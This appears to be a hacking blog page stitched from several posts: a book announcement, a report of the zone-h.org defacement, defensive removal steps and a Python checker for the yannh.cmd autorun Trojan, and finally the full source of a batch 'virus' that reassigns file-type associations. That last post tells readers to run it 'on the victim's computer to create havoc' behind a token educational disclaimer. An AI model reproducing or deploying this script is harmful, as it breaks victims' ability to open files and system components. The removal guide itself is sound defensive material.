I am very happy to announce that the e-book ‘Batch File Programming’, authored by me, was published on the Internet today. Moreover, I found 16 reads and 26 downloads within 12 minutes of uploading it to the popular document uploading site http://www.scribd.com.
If you want to read the book online, you can check this link.
You may also download the book from the link given above and enjoy reading it.
http://www.Zone-H.org, considered the Internet thermometer, which contains mirrors and archives of defaced sites from all around the world, was hacked today at 11:43 am GMT, Wednesday, Feb 11, 2009.
It seems it was defaced by Arabian hackers. They placed video content linked from YouTube that plays the baby dance, and mentioned that they were bored, so they hacked the site for fun.
Here I have enclosed a snapshot of how the defaced site (zone-h.org) looked:
“yannh.cmd” is a Trojan that often spreads widely from external storage media like USB drives, CDs and DVDs by injecting itself into the autorun.inf file.
When I explored my autorun.inf, I found a few autorun entries made by “Yannh.cmd”, like this:
open=yannh.cmd
shell\open\Command=yannh.cmd
shell\explore\Command=yannh.cmd
You can’t directly edit the autorun.inf file while it is in use. Another thing to notice is that the file's attribute is set to read-only, so you have to clear that attribute first to proceed further.
How can I identify whether my computer got infected?
Open up your command prompt and type
cd\
dir /a
dir /a displays all files in the root of the current drive, including hidden and system files.
This “Yannh.cmd” makes some registry entries in the following path…
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\kamsoft
and has its source file in the system32 directory with the name Kamsoft.
Here are the steps that help you get rid of this Trojan.
Step 1:
It is always recommended to back up your registry before touching it. After a successful backup,
go to the path below
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\kamsoft
and delete Kamsoft.
Step 2:
Open up the command prompt and type the following
cd\
attrib -r -s -h yannh.cmd
del yannh.cmd
This will delete the yannh.cmd file.
Step 3:
Now you have to delete the Kamsoft file from your system32 directory. Just type the commands below in the command prompt.
cd\
cd C:\WINDOWS\system32
attrib -r -s -h kamsoft.exe
del kamsoft.exe
Step 4:
Now you can edit the autorun.inf file to remove the entries added by yannh.cmd
cd\
attrib -r -h -s autorun.inf
edit autorun.inf
Now delete every line that mentions yannh.cmd and save the changes.
Now you are done with it.
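To check an autorun.inf for launch entries like the ones shown above before and after the Step 4 edit, here is an added example in Python; it is not part of the original post. The function names, the [AutoRun] header and the label line in the sample are assumptions made for illustration.

```python
import re

# Keys in autorun.inf that make Windows launch a program from the drive.
LAUNCH_KEY = re.compile(r"^(open|shellexecute|shell\\[^\\=]+\\command)$", re.I)

def launch_entries(text):
    """Return (section, key, target) for every launch entry in autorun.inf text."""
    found, section = [], ""
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):       # blank line or comment
            continue
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1].strip().lower()
            continue
        key, sep, value = line.partition("=")
        if sep and LAUNCH_KEY.match(key.strip()):
            found.append((section, key.strip().lower(), value.strip()))
    return found

def strip_entries(text, name):
    """Return the text without launch entries whose target mentions `name`."""
    kept = []
    for raw in text.splitlines():
        key, sep, value = raw.strip().partition("=")
        if sep and LAUNCH_KEY.match(key.strip()) and name.lower() in value.lower():
            continue                               # drop the injected line
        kept.append(raw)
    return "\n".join(kept)

# Constructed sample: the three entries from the post plus a harmless label line.
SAMPLE = """[AutoRun]
label=USB DISK
open=yannh.cmd
shell\\open\\Command=yannh.cmd
shell\\explore\\Command=yannh.cmd
"""

if __name__ == "__main__":
    for section, key, target in launch_entries(SAMPLE):
        print(f"[{section}] {key} -> {target}")
    print(strip_entries(SAMPLE, "yannh.cmd"))
```

Running launch_entries again on the cleaned text should return an empty list; any entry that remains points at another program that the drive would still try to start.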
Here are the similar files that you must be aware of,
Here I have enclosed the source code of a simple extension-replacing batch virus, “Ext_change”.
1. Open up Notepad and copy and paste the code below.
Title Ext_Change Virus
color a
Rem This Virus file replaces the actual file extensions with the given extensions
@echo off
assoc .txt=jpegfile
assoc .exe=htmlfile
assoc .jpeg=avifile
assoc .png=mpegfile
assoc .mpeg=txtfile
assoc .sys=regfile
msg Your System got Infected…..
exit
2. Save it with the extension .bat, and now you are ready to go.
3. Execute this on the victim's computer to create havoc.
It is only you who is responsible for what you do with this. We are not responsible for whatever you do with it, and it is meant only for educational purposes.
How it works
This virus file changes the file type associated with each listed extension to some other type, so users are unable to open their files unless they know how to deal with it.
It associates text files [.txt] with the JPEG file type [jpegfile], and likewise for the other extensions.